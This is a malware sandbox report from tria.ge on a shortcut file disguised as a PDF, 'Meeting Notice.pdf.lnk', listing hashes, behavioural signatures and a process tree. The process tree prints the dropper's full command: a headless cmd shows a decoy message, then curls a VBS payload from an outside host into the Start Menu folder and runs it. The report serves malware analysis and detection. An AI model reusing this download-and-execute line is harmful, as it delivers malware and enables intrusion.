Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2024, 02:44
Static task
static1
Behavioral task
behavioral1
Sample
Meeting Notice.pdf.lnk
Resource
win7-20231215-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
Meeting Notice.pdf.lnk
Resource
win10v2004-20231215-en
3 signatures
150 seconds
General
-
Target
Meeting Notice.pdf.lnk
-
Size
2KB
-
MD5
6d7ef2269e65ddbf8c2bbdd2fbf75882
-
SHA1
3181a05a32bdc7e122f998370dc70fa36270caba
-
SHA256
408292710999abc4d37f23a6672ef407d70ffb4dc2e3e030a5ec705735c1f8bd
-
SHA512
aab16a284ed892e190b7f3153242bfba4b35d73228f83da01be749453b2837004d1bb27aedda7b1e9e922ded212d4c0a311867b315a17902f5aa337f26556b3d
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3820 wrote to memory of 3988 3820 cmd.exe 91 PID 3820 wrote to memory of 3988 3820 cmd.exe 91 PID 3988 wrote to memory of 4516 3988 conhost.exe 92 PID 3988 wrote to memory of 4516 3988 conhost.exe 92 PID 4516 wrote to memory of 4736 4516 cmd.exe 93 PID 4516 wrote to memory of 4736 4516 cmd.exe 93 PID 4516 wrote to memory of 2060 4516 cmd.exe 94 PID 4516 wrote to memory of 2060 4516 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Meeting Notice.pdf.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" --headless cmd /c msg * "Corrupted" & curl --insecure http://adamsresearchshare.com/textcmd/cmd1.php -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs" & "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\System32\cmd.execmd /c msg * Corrupted & curl --insecure http://adamsresearchshare.com/textcmd/cmd1.php -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs" & "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\system32\msg.exemsg * Corrupted4⤵PID:4736
-
-
C:\Windows\system32\curl.execurl --insecure http://adamsresearchshare.com/textcmd/cmd1.php -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs"4⤵PID:2060
-
-
-